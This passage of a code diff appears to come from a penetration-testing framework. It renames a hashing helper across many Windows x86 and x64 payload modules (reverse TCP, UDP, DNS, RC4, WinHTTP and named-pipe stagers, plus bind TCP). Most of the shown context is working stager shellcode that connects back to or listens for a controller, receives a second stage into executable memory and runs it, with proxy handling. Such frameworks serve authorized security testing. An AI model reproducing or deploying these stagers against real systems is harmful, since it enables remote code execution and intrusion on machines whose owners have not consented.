; Receive the second stage and execute it...
xchg ebx, eax ; ebx = our new memory address for the new stage
@@ -217,7 +217,7 @@ module Payload::Windows::ReverseNamedPipe
push ecx ; nNumberOfBytesToRead
push ebx ; lpBuffer
push edi ; hFile
push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
push #{block_api_hash('kernel32.dll', 'ReadFile')}
call ebp ; ReadFile(...) to read the data
^
@@ -237,7 +237,7 @@ module Payload::Windows::ReverseNamedPipe
push 0x4000 ; dwFreeType (MEM_DECOMMIT)
push 0 ; dwSize
push eax ; lpAddress
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
push #{block_api_hash('kernel32.dll', 'VirtualFree')}
call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT)
; restore the stack (one more pop after 2nd ReadFile call)
pop esi
@@ -245,7 +245,7 @@ module Payload::Windows::ReverseNamedPipe
cleanup_file:
; clear up the named pipe handle
push edi ; named pipe handle
push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
push #{block_api_hash('kernel32.dll', 'CloseHandle')}
call ebp ; CloseHandle(...)
; restore the stack back to the connection retry count
+11 -11
View File
@@ -118,7 +118,7 @@ module Payload::Windows::ReverseTcp
push '32' ; Push the bytes 'ws2_32',0,0 onto the stack.
push 'ws2_' ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
mov eax, ebp
call eax ; LoadLibraryA( "ws2_32" )
@@ -126,7 +126,7 @@ module Payload::Windows::ReverseTcp
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this struct
push eax ; push the wVersionRequested parameter
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call ebp ; WSAStartup( 0x0190, &WSAData );
set_address:
@@ -145,7 +145,7 @@ module Payload::Windows::ReverseTcp
push eax ; push SOCK_STREAM
inc eax ;
push eax ; push AF_INET
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
^
@@ -168,7 +168,7 @@ module Payload::Windows::ReverseTcp
push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used)
push esi ; pointer to the sockaddr_in struct
push edi ; socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
push #{block_api_hash('ws2_32.dll', 'bind')}
call ebp ; bind( s, &sockaddr_in, 16 );
push #{encoded_host} ; host in little-endian format
push #{encoded_port} ; family AF_INET and port number
@@ -181,7 +181,7 @@ module Payload::Windows::ReverseTcp
push 16 ; length of the sockaddr struct
push esi ; pointer to the sockaddr struct
push edi ; the socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
push #{block_api_hash('ws2_32.dll', 'connect')}
call ebp ; connect( s, &sockaddr, 16 );
test eax,eax ; non-zero means a failure
@@ -201,7 +201,7 @@ module Payload::Windows::ReverseTcp
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
@@ -231,7 +231,7 @@ module Payload::Windows::ReverseTcp
push 4 ; length = sizeof( DWORD );
push esi ; the 4 byte buffer on the stack to hold the second stage length
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, &dwLength, 4, 0 );
^
@@ -251,7 +251,7 @@ module Payload::Windows::ReverseTcp
push 0x1000 ; MEM_COMMIT
push esi ; push the newly received second stage length.
push 0 ; NULL as we dont care where the allocation is.
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
xchg ebx, eax ; ebx = our new memory address for the new stage
@@ -262,7 +262,7 @@ module Payload::Windows::ReverseTcp
push esi ; length
push ebx ; the current address into our second stage's RWX buffer
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, buffer, length, 0 );
^
@@ -278,13 +278,13 @@ module Payload::Windows::ReverseTcp
push 0x4000 ; dwFreeType (MEM_DECOMMIT)
push 0 ; dwSize
push eax ; lpAddress
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
push #{block_api_hash('kernel32.dll', 'VirtualFree')}
call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT)
cleanup_socket:
; clear up the socket
push edi ; socket handle
push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
push #{block_api_hash('ws2_32.dll', 'closesocket')}
call ebp ; closesocket(socket)
; restore the stack back to the connection retry count
@@ -79,14 +79,14 @@ module Payload::Windows::ReverseTcpDns
push '32' ; Push the bytes 'ws2_32',0,0 onto the stack.
push 'ws2_' ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "ws2_32" )
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this struct
push eax ; push the wVersionRequested parameter
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call ebp ; WSAStartup( 0x0190, &WSAData );
push eax ; if we succeed, eax will be zero, push zero for the flags param.
@@ -97,7 +97,7 @@ module Payload::Windows::ReverseTcpDns
push eax ; push SOCK_STREAM
inc eax ;
push eax ; push AF_INET
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
@@ -108,7 +108,7 @@ module Payload::Windows::ReverseTcpDns
db "#{opts[:host]}", 0x00
got_hostname:
push #{Rex::Text.block_api_hash( "ws2_32.dll", "gethostbyname" )}
push #{block_api_hash( "ws2_32.dll", "gethostbyname" )}
call ebp ; gethostbyname( "name" );
set_address:
@@ -122,7 +122,7 @@ module Payload::Windows::ReverseTcpDns
push 16 ; length of the sockaddr struct
push esi ; pointer to the sockaddr struct
push edi ; the socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
push #{block_api_hash('ws2_32.dll', 'connect')}
call ebp ; connect( s, &sockaddr, 16 );
test eax,eax ; non-zero means a failure
@@ -142,7 +142,7 @@ module Payload::Windows::ReverseTcpDns
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
@@ -70,7 +70,7 @@ module Payload::Windows::ReverseTcpRc4
push 4 ; length = sizeof( DWORD );
push esi ; the 4 byte buffer on the stack to hold the second stage length
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, &dwLength, 4, 0 );
^
@@ -93,7 +93,7 @@ module Payload::Windows::ReverseTcpRc4
; push esi ; push the newly received second stage length.
push ecx ; push the alloc length
push 0 ; NULL as we dont care where the allocation is.
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
; xchg ebx, eax ; ebx = our new memory address for the new stage + S-box
@@ -106,7 +106,7 @@ module Payload::Windows::ReverseTcpRc4
push esi ; length
push ebx ; the current address into our second stage's RWX buffer
push edi ; the saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
push #{block_api_hash('ws2_32.dll', 'recv')}
call ebp ; recv( s, buffer, length, 0 );
^
@@ -122,13 +122,13 @@ module Payload::Windows::ReverseTcpRc4
push 0x4000 ; dwFreeType (MEM_DECOMMIT)
push 0 ; dwSize
push eax ; lpAddress
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
push #{block_api_hash('kernel32.dll', 'VirtualFree')}
call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT)
cleanup_socket:
; clear up the socket
push edi ; socket handle
push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
push #{block_api_hash('ws2_32.dll', 'closesocket')}
call ebp ; closesocket(socket)
; restore the stack back to the connection retry count
+6 -6
View File
@@ -75,14 +75,14 @@ module Payload::Windows::ReverseUdp
push '32' ; Push the bytes 'ws2_32',0,0 onto the stack.
push 'ws2_' ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "ws2_32" )
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this struct
push eax ; push the wVersionRequested parameter
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
push #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call ebp ; WSAStartup( 0x0190, &WSAData );
set_address:
@@ -101,7 +101,7 @@ module Payload::Windows::ReverseUdp
inc eax ;
push eax ; push SOCK_DGRAM (UDP socket)
push eax ; push AF_INET
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
push #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call ebp ; WSASocketA( AF_INET, SOCK_DGRAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
@@ -109,7 +109,7 @@ module Payload::Windows::ReverseUdp
push 16 ; length of the sockaddr struct
push esi ; pointer to the sockaddr struct
push edi ; the socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
push #{block_api_hash('ws2_32.dll', 'connect')}
call ebp ; connect( s, &sockaddr, 16 );
test eax,eax ; non-zero means a failure
@@ -129,7 +129,7 @@ module Payload::Windows::ReverseUdp
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
@@ -160,7 +160,7 @@ module Payload::Windows::ReverseUdp
db #{newline} ; newline
get_nl_address:
push edi ; saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
push #{block_api_hash('ws2_32.dll', 'send')}
call ebp ; call send
^
asm
@@ -205,7 +205,7 @@ module Payload::Windows::ReverseWinHttp
push 0x00707474 ; Push the string 'winhttp',0
push 0x686E6977 ; ...
push esp ; Push a pointer to the "winhttp" string
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "winhttp" )
^
@@ -215,7 +215,7 @@ module Payload::Windows::ReverseWinHttp
push 0x00323374 ; Push the string 'crypt32',0
push 0x70797263 ; ...
push esp ; Push a pointer to the "crypt32" string
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
push #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "wincrypt" )
^
end
@@ -236,7 +236,7 @@ module Payload::Windows::ReverseWinHttp
; ProxyName (via call)
push 3 ; AccessType (NAMED_PROXY= 3)
push ebx ; UserAgent (NULL) [1]
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}
push #{block_api_hash('winhttp.dll', 'WinHttpOpen')}
call ebp
^
else
@@ -246,7 +246,7 @@ module Payload::Windows::ReverseWinHttp
push ebx ; ProxyName (NULL)
push ebx ; AccessType (DEFAULT_PROXY= 0)
push ebx ; UserAgent (NULL) [1]
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}
push #{block_api_hash('winhttp.dll', 'WinHttpOpen')}
call ebp
^
end
@@ -280,7 +280,7 @@ module Payload::Windows::ReverseWinHttp
asm << %Q^
push eax ; Session handle returned by WinHttpOpen
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpConnect')}
push #{block_api_hash('winhttp.dll', 'WinHttpConnect')}
call ebp
WinHttpOpenRequest:
@@ -292,7 +292,7 @@ module Payload::Windows::ReverseWinHttp
push edi ; ObjectName (URI)
push ebx ; Verb (GET method) (NULL)
push eax ; Connect handle returned by WinHttpConnect
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpenRequest')}
push #{block_api_hash('winhttp.dll', 'WinHttpOpenRequest')}
call ebp
xchg esi, eax ; save HttpRequest handler in esi
^
@@ -325,7 +325,7 @@ module Payload::Windows::ReverseWinHttp
push 1 ; AuthScheme (WINHTTP_AUTH_SCHEME_BASIC = 1)
push 1 ; AuthTargets (WINHTTP_AUTH_TARGET_PROXY = 1)
push esi ; hRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetCredentials')}
push #{block_api_hash('winhttp.dll', 'WinHttpSetCredentials')}
call ebp
^
elsif opts[:proxy_ie] == true
@@ -337,7 +337,7 @@ module Payload::Windows::ReverseWinHttp
push edi ; store the current URL in case it's needed
mov edi, eax ; put the buffer pointer in edi
push edi ; Push a pointer to the buffer
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')}
push #{block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')}
call ebp
test eax, eax ; skip the rest of the proxy stuff if the call failed
@@ -374,7 +374,7 @@ module Payload::Windows::ReverseWinHttp
push edx ; lpcwszUrl
lea eax, [esp+64] ; Find the pointer to the hSession - HACK!
push [eax] ; hSession
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')}
push #{block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')}
call ebp
test eax, eax ; skip the rest of the proxy stuff if the call failed
@@ -403,7 +403,7 @@ module Payload::Windows::ReverseWinHttp
push edi ; lpBuffer (pointer to the proxy)
push 38 ; dwOption (WINHTTP_OPTION_PROXY)
push esi ; hRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')}
push #{block_api_hash('winhttp.dll', 'WinHttpSetOption')}
call ebp
ie_proxy_setup_finish:
@@ -420,7 +420,7 @@ module Payload::Windows::ReverseWinHttp
push eax ; &buffer
push 31 ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS)
push esi ; hHttpRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')}
push #{block_api_hash('winhttp.dll', 'WinHttpSetOption')}
call ebp
^
end
@@ -456,7 +456,7 @@ module Payload::Windows::ReverseWinHttp
asm << %Q^
push esi ; HttpRequest handle returned by WinHttpOpenRequest [1]
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')}
push #{block_api_hash('winhttp.dll', 'WinHttpSendRequest')}
call ebp
test eax,eax
jnz check_response ; if TRUE call WinHttpReceiveResponse API
@@ -476,7 +476,7 @@ module Payload::Windows::ReverseWinHttp
else
asm << %Q^
failure:
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
push #{block_api_hash('kernel32.dll', 'ExitProcess')}
call ebp
^
end
@@ -500,7 +500,7 @@ module Payload::Windows::ReverseWinHttp
push ebx ; &buffer
push 78 ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT)
push esi ; hHttpRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpQueryOption')}
push #{block_api_hash('winhttp.dll', 'WinHttpQueryOption')}
call ebp
test eax, eax ;
jz failure ; Bail out if we couldn't get the certificate context
@@ -517,7 +517,7 @@ module Payload::Windows::ReverseWinHttp
push edi ; &buffer (20-byte SHA1 hash)
push 3 ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID)
push [ebx] ; *pCert
push #{Rex::Text.block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')}
push #{block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')}
call ebp
test eax, eax ;
jz failure ; Bail out if we couldn't get the certificate context
@@ -555,7 +555,7 @@ module Payload::Windows::ReverseWinHttp
; first to get a valid handle for WinHttpReadData
push ebx ; Reserved (NULL)
push esi ; Request handler returned by WinHttpSendRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
push #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
call ebp
test eax,eax
jz failure
@@ -570,7 +570,7 @@ module Payload::Windows::ReverseWinHttp
push 4 ; bytes to read
push eax ; &stage size
push esi ; hRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')}
push #{block_api_hash('winhttp.dll', 'WinHttpReadData')}
call ebp ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead)
pop ebx ; bytesRead (unused, pop for cleaning)
pop ebx ; stage size
@@ -583,7 +583,7 @@ module Payload::Windows::ReverseWinHttp
push 0x1000 ; MEM_COMMIT
push ebx ; Stage allocation
push eax ; NULL as we dont care where the allocation is
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
@@ -597,7 +597,7 @@ module Payload::Windows::ReverseWinHttp
push eax ; read length
push ebx ; buffer
push esi ; hRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')}
push #{block_api_hash('winhttp.dll', 'WinHttpReadData')}
call ebp
test eax,eax ; download failed? (optional?)
jz failure
@@ -610,7 +610,7 @@ module Payload::Windows::ReverseWinHttp
; first to get a valid handle for WinHttpReadData
push ebx ; Reserved (NULL)
push esi ; Request handler returned by WinHttpSendRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
push #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
call ebp
test eax,eax
jz failure
@@ -620,7 +620,7 @@ module Payload::Windows::ReverseWinHttp
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (4Mb ought to do us)
push ebx ; NULL as we dont care where the allocation is
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
push #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
@@ -634,7 +634,7 @@ module Payload::Windows::ReverseWinHttp
push 8192 ; NumberOfBytesToRead
push ebx ; Buffer
push esi ; Request handler returned by WinHttpReceiveResponse
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')}
push #{block_api_hash('winhttp.dll', 'WinHttpReadData')}
call ebp
test eax,eax ; if download failed? (optional?)
+1 -1
View File
@@ -28,7 +28,7 @@ module Payload::Windows::SendUUID
db #{raw_to_db(uuid_raw)} ; UUID
get_uuid_address:
push edi ; saved socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
push #{block_api_hash('ws2_32.dll', 'send')}
call ebp ; call send
^
@@ -47,7 +47,7 @@ module Payload::Windows::AddrLoader_x64
pop r8 ; MEM_COMMIT
mov rdx, rsi ; the newly received second stage length.
xor rcx, rcx ; NULL as we dont care where the allocation is.
mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
mov rbx, rax ; rbx = our new memory address for the new stage
@@ -121,7 +121,7 @@ module Payload::Windows::BindNamedPipe_x64
pop r8 ; nNumberOfBytesToWrite
sub rsp, 16 ; allocate + alignment
mov r9, rsp ; lpNumberOfBytesWritten
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
mov r10d, #{block_api_hash('kernel32.dll', 'WriteFile')}
call rbp ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten)
add rsp, 16
^
@@ -159,7 +159,7 @@ module Payload::Windows::BindNamedPipe_x64
push 0 ; nDefaultTimeOut
push #{chunk_size} ; nInBufferSize
push #{chunk_size} ; nOutBufferSize
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
mov r10d, #{block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
call rbp ; CreateNamedPipeA
mov rdi, rax ; save hPipe (using sockrdi convention)
@@ -175,11 +175,11 @@ module Payload::Windows::BindNamedPipe_x64
connect_pipe:
mov rcx, rdi ; hPipe
xor rdx, rdx ; lpOverlapped
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
mov r10d, #{block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
call rbp ; ConnectNamedPipe
; check for failure
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetLastError')}
mov r10d, #{block_api_hash('kernel32.dll', 'GetLastError')}
call rbp ; GetLastError
cmp rax, 0x217 ; looking for ERROR_PIPE_CONNECTED
jz get_stage_size ; success
@@ -188,7 +188,7 @@ module Payload::Windows::BindNamedPipe_x64
; wait before trying again
mov rcx, #{retry_wait}
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')}
call rbp ; Sleep
jmp connect_pipe
^
@@ -206,7 +206,7 @@ module Payload::Windows::BindNamedPipe_x64
mov rdx, rsp ; lpMode (PIPE_WAIT)
xor r8, r8 ; lpMaxCollectionCount
xor r9, r9 ; lpCollectDataTimeout
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
mov r10d, #{block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
call rbp
^
end
@@ -221,7 +221,7 @@ module Payload::Windows::BindNamedPipe_x64
mov r9, rsp ; lpNumberOfBytesRead
push 0 ; alignment
push 0 ; lpOverlapped
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')}
call rbp ; ReadFile
add rsp, 0x30 ; adjust stack
pop rsi ; lpNumberOfBytesRead
@@ -246,7 +246,7 @@ module Payload::Windows::BindNamedPipe_x64
pop r8 ; MEM_COMMIT
mov rdx, rsi ; the newly received second stage length.
xor rcx, rcx ; NULL as we dont care where the allocation is.
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
^
@@ -275,7 +275,7 @@ module Payload::Windows::BindNamedPipe_x64
mov rdx, rbx ; lpBuffer
push 0 ; lpOverlapped
mov rcx, rdi ; hPipe
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
mov r10d, #{block_api_hash('kernel32.dll', 'ReadFile')}
call rbp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
add rsp, 0x28 ; slight stack adjustment
pop rdx ; lpNumberOfBytesRead
@@ -294,14 +294,14 @@ module Payload::Windows::BindNamedPipe_x64
pop r8 ; dwFreeType
push 0 ; 0 to decommit whole block
pop rdx ; dwSize
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
mov r10d, #{block_api_hash('kernel32.dll', 'VirtualFree')}
call rbp ; VirtualFree(payload, 0, MEM_RELEASE)
cleanup_file:
; clean up the pipe handle
push rdi ; file handle
pop rcx ; hFile
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
mov r10d, #{block_api_hash('kernel32.dll', 'CloseHandle')}
call rbp ; CloseHandle(hPipe)
jmp failure
@@ -333,7 +333,7 @@ module Payload::Windows::BindNamedPipe_x64
db "kernel32", 0x00
get_kernel32_name:
pop rcx ;
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')}
mov r10d, #{block_api_hash('kernel32.dll', 'GetModuleHandleA')}
call rbp ; GetModuleHandleA("kernel32")
call get_exit_name
@@ -341,7 +341,7 @@ module Payload::Windows::BindNamedPipe_x64
get_exit_name:
mov rcx, rax ; hModule
pop rdx ; lpProcName
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')}
mov r10d, #{block_api_hash('kernel32.dll', 'GetProcAddress')}
call rbp ; GetProcAddress(hModule, "ExitThread")
xor rcx, rcx ; dwExitCode
call rax ; ExitThread(0)
@@ -71,7 +71,7 @@ module Payload::Windows::BindTcpRc4_x64
push 4 ;
pop r8 ; length = sizeof( DWORD );
mov rcx, rdi ; the saved socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
call rbp ; recv( s, &dwLength, 4, 0 );
add rsp, 32 ; we restore RSP from the api_call so we can pop off RSI next
@@ -86,7 +86,7 @@ module Payload::Windows::BindTcpRc4_x64
pop r8 ; MEM_COMMIT
mov rdx, rsi ; the newly received second stage length.
xor rcx,rcx ; NULL as we dont care where the allocation is.
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')}
call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
; mov rbx, rax ; rbx = our new memory address for the new stage
@@ -102,7 +102,7 @@ module Payload::Windows::BindTcpRc4_x64
mov r8, rsi ; length
mov rdx, rbx ; the current address into our second stages RWX buffer
mov rcx, rdi ; the saved socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
call rbp ; recv( s, buffer, length, 0 );
add rsp, 32 ; restore stack after api_call
@@ -143,14 +143,14 @@ module Payload::Windows::BindTcp_x64
; perform the call to LoadLibraryA...
mov rcx, r14 ; set the param for the library to load
mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
mov r10d, #{block_api_hash('kernel32.dll', 'LoadLibraryA')}
call rbp ; LoadLibraryA( "ws2_32" )
; perform the call to WSAStartup...
mov rdx, r13 ; second param is a pointer to this struct
push 0x0101 ;
pop rcx ; set the param for the version requested
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
mov r10d, #{block_api_hash('ws2_32.dll', 'WSAStartup')}
call rbp ; WSAStartup( 0x0101, &WSAData );
; perform the call to WSASocketA...
@@ -162,7 +162,7 @@ module Payload::Windows::BindTcp_x64
xor r8, r8 ; we do not specify a protocol
inc rax ;
mov rdx, rax ; push SOCK_STREAM
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
mov r10d, #{block_api_hash('ws2_32.dll', 'WSASocketA')}
call rbp ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 );
mov rdi, rax ; save the socket for later
@@ -172,26 +172,26 @@ module Payload::Windows::BindTcp_x64
; first 8 bytes as the rest aren't used)
mov rdx, r12 ; set the pointer to sockaddr_in struct
mov rcx, rdi ; socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
mov r10d, #{block_api_hash('ws2_32.dll', 'bind')}
call rbp ; bind( s, &sockaddr_in, #{sockaddr_size} );
; perform the call to listen...
xor rdx, rdx ; backlog
mov rcx, rdi ; socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')}
mov r10d, #{block_api_hash('ws2_32.dll', 'listen')}
call rbp ; listen( s, 0 );
; perform the call to accept...
xor r8, r8 ; we set length for the sockaddr struct to zero
xor rdx, rdx ; we dont set the optional sockaddr param
mov rcx, rdi ; listening socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')}
mov r10d, #{block_api_hash('ws2_32.dll', 'accept')}
call rbp ; accept( s, 0, 0 );
; perform the call to closesocket...
mov rcx, rdi ; the listening socket to close
mov rdi, rax ; swap the new connected socket over the listening socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
mov r10d, #{block_api_hash('ws2_32.dll', 'closesocket')}
call rbp ; closesocket( s );
; restore RSP so we dont have any alignment issues with the next block...
@@ -213,7 +213,7 @@ module Payload::Windows::BindTcp_x64
push 4 ;
pop r8 ; length = sizeof( DWORD );
mov rcx, rdi ; the saved socket
mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
mov r10d, #{block_api_hash('ws2_32.dll', 'recv')}
call rbp ; recv( s, &dwLength, 4, 0 );
add rsp, 32 ; we restore RSP from the api_call so we can pop off RSI next
@@ -226,7 +226,7 @@ module Payload::Windows::BindTcp_x64
pop r8 ; MEM_COMMIT
mov rdx, rsi ; the newly received second stage length.
